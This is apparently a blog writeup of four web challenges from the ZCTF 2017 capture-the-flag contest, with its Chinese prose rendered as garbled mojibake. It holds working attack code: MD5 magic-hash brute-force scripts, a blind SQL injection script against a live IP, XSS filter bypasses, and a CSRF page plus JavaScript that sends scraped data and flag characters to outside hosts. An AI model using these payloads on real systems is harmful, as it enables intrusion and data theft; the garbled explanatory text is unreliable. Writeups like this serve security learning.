LoRexxar's Blog

zctf2017 writeup

2017/02/27

image_1b9uuk1n36lm1gonn8bemmv99.png-454.2kB

2鏈堟湯鎵撲簡涓獄ctf锛岃瀹炶瘽棰樼洰鍑虹殑涓嶅ソ锛屾墍鏈夌殑web棰樼洰閮芥槸鍋囬鐩紝绋嶅井璁板綍涓嬪惂

web1

娌′粈涔堟剰鎬

瀛樺湪

1
2
3
4
5
6
7
8
9
10
11
12
.index.php.swp
<?php
$flag = $_GET['flag'];
if ($flag != '15562') {
if (strstr($flag, 'zctf')) {
if (substr(md5($flag),8,16) == substr(md5('15562'),8,16)) {
die('ZCTF{#########}');
}
}##
}
die('ha?')
?>

鐩存帴鍐欒剼鏈
鐖嗙牬涓涓

1
2
3
4
5
6
7
8
9
10
<?php
for ($a = 1; $a <= 999999; $a++) {
$flag = $a."zctf";
if (substr(md5($flag),8,16) == substr(md5('15562'),8,16)){
echo $flag.":";
echo substr(md5($flag),8,16)."\n";
}
}
echo $flag;
?>

鍥犱负鏄 0e 寮澶寸殑锛岀垎鐮村墠涓や綅灏卞彲浠

1
2
3
4
5
6
7
8
9
10
11
12
13
for i in range(10000000):
s = 'zctf' + str(i)
md5 = hashlib.md5(s).hexdigest()
h = md5[8:24]
flag = 1
if md5[8:10] == '0e':
for j in md5[10:24]:
if j.isalpha():
flag = 0
break
if flag == 1:
print s
break

web2

绋嶅井缈荤炕绔欙紝鍏跺疄娌′粈涔堝姛鑳斤紝鍙湁contact.php杩欓噷鏄竴涓湁杩斿洖鐨勫姛鑳斤紝鍏朵粬鐨勯兘鏄洿鎺ヨ烦#鐨勶紝閭d箞闂灏辨槸杩欎釜浜

1
2
3
4
http://58.213.63.30:10006/a0f1b29db350fdac2ad6dc4cb92dbd2b/message.php
Name=dsafim<link>gafsadsa&Email=123%40qq.com&Team=1321321&textarea=321421321

CSP

1
2
Content-Security-Policy
default-src 'self'; script-src 'self' 'unsafe-inline';

杩欓鍏跺疄鏈澶х殑闂灏辨槸澶繃涓ユ牸鐨勮繃婊や互鍙婄洸娴嬶紝闄や簡textarea鏈夊垽鏂互澶栵紝鍏朵粬鐨勯兘娌′粈涔堟娴嬶紝浜嬪疄鏄彧璁板綍浜嗚繖涓,script寰堥殢渚匡紝浣嗚繃婊や簡锛

1
2
3
4
5
6
7
8
9
10
11
12
13
14
eval
document
location
href
window
src
svg
img
open
callback
鍗曞弻寮曞彿
鎷彿
鍙嶆枩鏉
$\#

闂鐨勬牳蹇冨叾瀹炴槸娌℃湁鎷彿锛屾病鏈変换浣曞姙娉曠粫杩囦紶鍏ュ瓧绗︿覆锛屼篃娌″姙娉曟墦cookie锛屽悗鏉ユ病鍔炴硶鎵惧埌浜嗛暱鐭煭鐨刡ypass csp鏂瑰紡锛岃幏鍙栬姹傜殑鏃跺欏彂鐜扮洿鎺ユ嬁鍒颁簡flag鈥

payload

1
2
3
4
</textarea><script>//@ sourceMappingURL=http://0xb.pw</script>
zctf%7Be042d9c03263521c86025a4b47b03055%7D

web3 eazy apk

鍒嗘瀽apk锛屾壘鍒http://58.213.63.30:10005/

鍒嗘瀽鍑哄姞瀵嗙殑鏂瑰紡锛屽啓涓剼鏈

1
2
3
4
5
6
7
8
9
10
key = "1470"*10
name = "' AND select 1#"
name = ''.join(reversed(list(name)))
tmp=[]
for i in range(len(name)):
tmp.append(hex(ord(name[i])^ord(key[i]))[2:].zfill(2))
enc = ''.join(tmp)
print enc

鐚滄祴鏄痵ql娉ㄥ叆锛屼絾鏄湁鐐瑰効楹荤儲鐨勬槸union select鍜屾嫭鍙疯杩囨护浜嗭紝寰堥毦鍙椼

鍚庢潵鏌ュ埌鍙互鐢ㄧ敤union distinct select鏂瑰紡缁曡繃union select 锛岀劧鍚庝娇鐢╫rder by鐩叉敞

admin'union distinct select 1,鈥檛est鈥,'3' order by 3 desc#
濡傛灉username杩斿洖鐨勬槸admin锛岄偅涔堣嚜宸辨瀯閫犵殑password灏忎簬admin鐨勫瘑鐮
澶т簬鐨勮瘽灏变細杩斿洖test

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
#5AF1AB27B1BE8BB8E39BDF98CD2CFCE4
password = ""
for i in range(0,33):
for j in range(33,127):
key = "1470"*100
name = "admin'union distinct select 1,'test','"+password+chr(j)+"' order by 3 desc #"
print name
name = ''.join(reversed(list(name)))
tmp=[]
print len(name)
for i in range(len(name)):
tmp.append(hex(ord(name[i])^ord(key[i]))[2:].zfill(2))
enc = ''.join(tmp)
print enc
r = requests.post(url = "http://58.213.63.30:10005" , data = {'username':enc,'password':'123'})
# print r. content
if "test" in r.content:
password = password+chr(j-1)
break
print password

瀵嗙爜5AF1AB27B1BE8BB8E39BDF98CD2CFCE4
鎷縞md5鏌
瀵嗙爜鏄庢枃:CleverBoy123
鍔犲瘑涔嬪悗

1
2
username=鈥5f5d5a5450鈥
password=鈥020606495e76455547515b73鈥

鎵嬫満apk鐧婚檰鍚庡彂鐜版槸鍙戦侀偖浠剁殑锛屾姄鍖

1
2
3
http://58.213.63.30:10005/mail.php
body=45475244&password=020606495e76455547515b73&title=45475244&username=5f5d5a5450&mail=521a557050

鐞嗘墍褰撶劧璁や负鏄痯hpmailer鐨刢ve锛屽彧鏄兂浜嗗緢涔呮庝箞鍐欎釜webshell杩涘幓锛屽彲鎯滄病鎯冲埌闅忎究娴嬭瘯浜嗕竴涓嬭兘涓嶈兘鍐欏叆鏂囦欢锛岀粨鏋滃氨getflag浜嗏

浠ュ墠鍐欒繃鍒嗘瀽鏂囩珷锛岄殢渚夸竴涓猵ayload閮藉彲浠
http://lorexxar.cn/2016/12/28/cve-2016-10030/

web4鏃堕棿

鍔熻兘绋嶅井鏈夌偣鍎垮鐨

鍒嗘瀽涓

1銆乸rofile.php鍙互璁剧疆澶村儚锛岃繖閲屽唴瀹逛笉鍙楀奖鍝嶏紝鍙互鏀句换浣曚笢瑗

1
2
3
4
5
6
7
8
9
10
http://58.213.63.30:10003/uploads/0df8ddb2fee38858a4ddb8307d77f95baf869147.png
HTTP/1.1 200 OK
Date: Sun, 26 Feb 2017 04:52:31 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Sun, 26 Feb 2017 04:50:09 GMT
ETag: "9-54967b28d17fd"
Accept-Ranges: bytes
Content-Length: 9
Content-Type: image/png

2銆乶ote.php鍦版柟鍙互娣诲姞浠涔堜笢瑗匡紝浣嗘槸闇瑕乧srftoken锛屽鏋滃彲浠ュ啓js鐨勮瘽锛屽彲浠ョ粫

ps锛氬彧鏄剧ず6鏉

3銆http://58.213.63.30:10003/search.php?keywords=1鍙互鏌ヨ锛屼絾鏄繑鍥炲彧鏈夋暟鐩

ps锛氳繖閲屾槸like鐨勮娉曪紝涔熷氨鏄鍙互閫愪綅鐨勮窇涓浜涘唴瀹

4銆乥ugsubmit鐚滄祴鏈夊嚑涓埄鐢ㄧ偣锛屼竴涓槸url锛屽彲鑳戒細鐐瑰嚮锛屼竴涓槸鍥剧墖锛屽彲浠ュ姞澶栭摼鐨勶紝浣嗘槸濂藉儚浠涔堥兘娌″彂鐢燂紙杩欓噷鍧戜簡瓒呬箙锛屽紑濮嬫祴璇曠殑鏃跺欙紝杩欓噷閾炬帴鏄病浜虹偣鍑荤殑鈥﹀緢鏅氫簡娴嬭瘯鐨勬椂鍊欐棤鎰忎腑鍙戠幇鏈変汉鐐瑰嚮鈥﹀鑷翠篃灏辨潵涓嶅強鍐檖ayload浜嗭級

5銆乧ookie鏄痟ttponly

nikename鍜宎ddress鍙互xss锛屽鍐欑粫杩囷紝杩欐牱灏栨嫭鍙峰氨涓嶄細琚浆涔変簡锛堜笉鐭ラ亾杩欓噷鍜嬪啓鐨勨﹀崟绾紶鍏ュ皷鎷彿浼氳杞箟锛

1
2
3
<scrsvgipt>alert(1)</scrsvgipt>
<scrsvgipt src=//119.29.192.14/1></scrsvgipt>

鍙互闅忔剰寮鐏紝浣嗘槸涓嶈兘璁╁埆浜虹湅鍒帮紝鎵浠ラ渶瑕佷竴涓猚srf鏉ヨ鍒汉淇敼鑷繁鐨勪釜浜轰俊鎭

bugsubmit鐨勪笂浼犲浘鐗囨槸鍋囩殑锛岀洿鎺ヨ浆鎴愪簡img鏍囩

鍚庢潵鍙戠幇鎻愪氦鐨勯摼鎺ユ槸浼氳鐐瑰嚮鐨勶紝閭d箞鎬濊矾寰堢畝鍗曚簡锛屽氨鏄瀯閫犱竴涓嚜鍔ㄦ彁浜ゆ潵淇敼鏌ョ湅浜虹殑涓汉淇℃伅锛岀劧鍚庢墽琛宩s

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<html>
<head>
<script src="jquery-3.1.0.min.js"></script>
</head>
<body>
<form action="http://58.213.63.30:10003/checkProfile.php" method="POST" id="profile" enctype="multipart/form-data">
<input class="form-control" name="nick" id="nick" />
<input class="form-control" name="age" id="age" />
<input class="form-control" name="address" id="address" />
</form>
<script>
$("form input:eq(0)").val("\<scriscriptpt src=http:\/\/119.29.192.14\/2\>");
$("form input:eq(2)").val('\<\/scrscriptipt\>');
$("form").submit();
</script>
</body>
</html>

杩檖ayload鏄墦鍒板悗鍙板悗闅忎究鎵句簡涓汉鎵掔殑锛岃繖閮ㄥ垎寰堢畝鍗曞氨涓嶈禈杩颁簡

鍏抽敭鏄鎵ц浠涔坖s鍛紝浠旂粏鐪嬬湅涓婇潰鐨勪俊鎭紝cookie鏄痟ttponly鐨勶紝鎵浠ユ垜浠病鍔炴硶鑾峰彇cookie锛岄偅涔坒lag鍙湁鍙兘鏄瓨鍦╪ote涓殑浜嗭紝鑰宯ote涓彧鏄剧ず6鏉★紙鍚摑鐚笀鍌呰杩欓噷鏄瀬涔愬噣鍦熲.锛夛紝search澶勫彲浠ユ煡璇紝浣嗘槸闇瑕侀愪綅璺戯紝杩欐牱灏遍渶瑕佷竴涓剼鏈簡鈥(杩欓噷鏈変釜鏂扮殑闂锛屼篃灏辨槸瀵艰嚧鎴戞病鏈夎幏寰梖lag鐨勬渶澶ч棶棰樷﹁剼鏈墽琛屾椂闂存湁闄愶紝鎴戜娇鐢ㄤ簡璺戝畬杩斿洖鐨勬柟寮忊︾粨鏋滀竴娆¢兘娌℃敹鍒帮紝鎴戜互涓烘槸鍒殑闂锛岃繕璺戜簡涓涓媙ote鐨勬潯鏁)

1
2
3
4
5
杩欎釜鏄繑鍥炴暟鐩殑payload
$.get('http://58.213.63.30:10003/search.php?keywords=%', function(result){
$.get('http://0xb.pw?a='+ escape(result.substr(2400,30)));
})

杩樻湁鎵揻lag鐨刾ayload

1
2
3
4
5
6
7
8
9
10
11
12
13
tab="0123456789abcdefghijklmnopqrstuvwxyz}"
str=''
$.ajaxSettings.async=false
for(i=0;i<40;i++){
for(i=0;i<tab.length;i++){
flag=false
x=$.get('http://58.213.63.30:10003/search.php?keywords='+str+tab[i]);
if(x.status==404) flag=true;
if(!flag) break;
}
$.get("http://0xb.pw/?a="+escape(tab[i]))
str+=tab[i];
}

杩樻病娴嬭瘯灏卞叧棰樼洰浜嗏﹀氨杩欐牱鍚

CATALOG
  1. 1. web1
  2. 2. web2
  3. 3. web3 eazy apk
  4. 4. web4鏃堕棿